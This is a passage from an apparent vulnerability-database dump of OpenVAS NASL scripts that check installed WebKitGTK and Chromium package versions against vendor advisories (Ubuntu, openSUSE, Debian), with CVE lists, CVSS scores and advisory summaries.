'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.04,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3376-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3376-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-08T12:54:09", "description": "The remote host is missing an update for\n the ", "cvss3": {}, "published": "2019-04-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3948-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8518", "CVE-2019-11070", "CVE-2019-8523", "CVE-2019-8563", "CVE-2019-8506", "CVE-2019-8559", "CVE-2019-8558", "CVE-2019-8551", "CVE-2019-6251", "CVE-2019-8544", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8375", "CVE-2019-8524"], "modified": "2020-01-06T00:00:00", "id": "OPENVAS:1361412562310843977", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843977", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843977\");\n script_version(\"2020-01-06T10:43:33+0000\");\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6251\", \"CVE-2019-8375\", \"CVE-2019-8506\",\n \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\",\n \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\",\n \"CVE-2019-8559\", \"CVE-2019-8563\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-06 10:43:33 +0000 (Mon, 06 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-17 02:00:36 +0000 (Wed, 17 Apr 2019)\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3948-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU18\\.10)\");\n\n script_xref(name:\"USN\", value:\"3948-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3948-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'webkit2gtk' package(s) announced via the USN-3948-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version\n is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A large number of security issues were\ndiscovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\ninto viewing a malicious website, a remote attacker could exploit a variety of\nissues related to web browser security, including cross-site scripting attacks,\ndenial of service attacks, and arbitrary code execution.\");\n\n script_tag(name:\"affected\", value:\"'webkit2gtk' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.24.1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.24.1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.24.1-0ubuntu0.18.10.2\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.24.1-0ubuntu0.18.10.2\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T16:48:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-03-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0308-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2019-6217", "CVE-2018-4443", "CVE-2019-6233", "CVE-2018-4438", "CVE-2019-6229", "CVE-2018-4464", "CVE-2019-6227", "CVE-2019-6226", "CVE-2018-4441", "CVE-2019-6234", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6212"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852338", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852338\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\",\n \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\",\n \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\",\n \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-03-09 04:08:40 +0100 (Sat, 09 Mar 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0308-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0308-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-03/msg00014.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0308-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.6 fixes the following issues\n (boo#1124937 boo#1119558):\n\n Security vulnerabilities fixed:\n\n - CVE-2018-4437: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web content may lead to\n arbitrary code execution. A logic issue existed resulting in memory\n corruption. This was addressed with improved state management.\n (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web content may lead to\n arbitrary code execution. A type confusion issue was addressed with\n improved memory handling.\n\n - CVE-2019-6216: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web content may lead to\n arbitrary code execution. Multiple memory corruption issues were\n addressed with improved memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web content may lead to\n arbitrary code execution. A memory corruption issue was addressed with\n improved memory handling.\n\n - CVE-2019-6229: Processing maliciously crafted web content may lead to\n universal cross site scripting. A logic issue was addressed with\n improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.6~lp150.2.12.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:37", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-5179\nYannic Boneberger discovered an error in the ServiceWorker implementation.\n\nCVE-2018-17462\nNed Williamson and Niklas Baumstark discovered a way to escape the sandbox.\n\nCVE-2018-17463\nNed Williamson and Niklas Baumstark discovered a remote code execution\nissue in the v8 javascript library.\n\nCVE-2018-17464\nxisigr discovered a URL spoofing issue.\n\nCVE-2018-17465\nLin Zuojian discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2018-17466\nOmair discovered a memory corruption issue in the angle library.\n\nCVE-2018-17467\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17468\nJams Lee discovered an information disclosure issue.\n\nCVE-2018-17469\nZhen Zhou discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-17470\nZhe Jin discovered a memory corruption issue in the GPU backend\nimplementation.\n\nCVE-2018-17471\nLnyas Zhang discovered an issue with the full screen user interface.\n\nCVE-2018-17473\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17474\nZhe Jin discovered a use-after-free issue.\n\nCVE-2018-17475\nVladimir Metnew discovered a URL spoofing issue.\n\nCVE-2018-17476\nKhalil Zhani discovered an issue with the full screen user interface.\n\nCVE-2018-17477\nAaron Muir Hamilton discovered a user interface spoofing issue in the\nextensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library included\nwith chromium.", "cvss3": {}, "published": "2018-11-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4330-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704330", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704330", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4330-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704330\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\",\n \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\",\n \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\",\n \"CVE-2018-5179\");\n script_name(\"Debian Security Advisory DSA 4330-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-02 00:00:00 +0100 (Fri, 02 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4330.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 70.0.3538.67-1~deb9u1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/chromium-browser\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-5179\nYannic Boneberger discovered an error in the ServiceWorker implementation.\n\nCVE-2018-17462\nNed Williamson and Niklas Baumstark discovered a way to escape the sandbox.\n\nCVE-2018-17463\nNed Williamson and Niklas Baumstark discovered a remote code execution\nissue in the v8 javascript library.\n\nCVE-2018-17464\nxisigr discovered a URL spoofing issue.\n\nCVE-2018-17465\nLin Zuojian discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2018-17466\nOmair discovered a memory corruption issue in the angle library.\n\nCVE-2018-17467\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17468\nJams Lee discovered an information disclosure issue.\n\nCVE-2018-17469\nZhen Zhou discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-17470\nZhe Jin discovered a memory corruption issue in the GPU backend\nimplementation.\n\nCVE-2018-17471\nLnyas Zhang discovered an issue with the full screen user interface.\n\nCVE-2018-17473\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17474\nZhe Jin discovered a use-after-free issue.\n\nCVE-2018-17475\nVladimir Metnew discovered a URL spoofing issue.\n\nCVE-2018-17476\nKhalil Zhani discovered an issue with the full screen user interface.\n\nCVE-2018-17477\nAaron Muir Hamilton discovered a user interface spoofing issue in the\nextensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library included\nwith chromium.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromedriver\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-widevine\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:52:56", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814096", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814096", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Mac OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814096\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", 